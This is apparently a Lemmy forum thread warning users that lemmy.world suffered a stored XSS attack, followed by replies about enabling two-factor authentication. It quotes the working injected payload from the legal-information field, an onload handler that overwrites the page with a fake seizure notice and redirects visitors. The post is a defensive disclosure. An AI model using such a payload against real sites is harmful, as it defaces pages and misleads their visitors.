# DO NOT OPEN THE “LEGAL” PAGE — lemmy.world is a victim of an XSS attack right now and the hacker simply injected a JavaScript redirection into the sidebar.

It appears the Lemmy backend does not escape HTML in the main sidebar. Not sure if this is also true for community sidebars.

[https://sh.itjust.works/pictrs/image/707c0f16-3d5c-4888-b865-34228d968ee6.png]

EDIT: the exploit is also in the tagline that appears on top of the main feed for status updates, like the following one for SDF Chatter:

[https://sh.itjust.works/pictrs/image/2dc8838f-4611-4b62-92d2-ab45d7b1c560.png]

[https://sh.itjust.works/pictrs/image/9195ec9c-166e-4190-a991-26d218089602.png]

EDIT 2: The legal information field also has that exploit, so that when you go to the “Legal” page it shows the HTML unescaped, but fortunately (for now) he’s using double-quotes.

```
"legal_information":" ![\" onload=\"if(localStorage.getItem(`h`) != `true`){document.body.innerHTML = `\u003Ch1\u003ESite has been seized by Reddit for copyright infringment\u003C\u002Fh1\u003E`; setTimeout(() =\u003E {window.location.href = `https:\u002F\u002Flemmy.world\u002Fpictrs\u002Fimage\u002F7aa772b7-9416-45d1-805b-36ec21be9f66.mp4`}, 10000)}\"](https:\u002F\u002Flemmy.world\u002Fpictrs\u002Fimage\u002F66ca36df-4ada-47b3-9169-01870d8fb0ac.png \"lw\")
```
I encourage everyone, but especially mods, to enable 2FA on their account. I’ll do up a post tonight with screenshots on exactly how to do this; I realise the lemmy process isn’t as smooth as it could be. Ideally it would present a QR code to scan with your phone as most other sites do.
I tried doing this but have lost access to my aussie.zone account (same user name). I checked the 2FA box but I couldn’t see the extra setup steps (I think I refreshed the page), so I unchecked the box and saved. I then changed my pw. Now it seems to accept new pw but am getting incorrect 2FA token error. What do I do?
Oh bugger. Sorry, I’ll need to find out how to manually toggle 2FA on your account in the database. I won’t be able to do this until I get home this evening.
You are one of the best admins I’ve met in my coupla decades of internet usage. I love ya work mate and if you ever want a hand from a fellow sysadmin hit me up.
Thanks in advance
Try now… think I’ve disabled it on your aussie.zone account.
Thank you, that worked!
Excellent 🙂
aww thanks 😇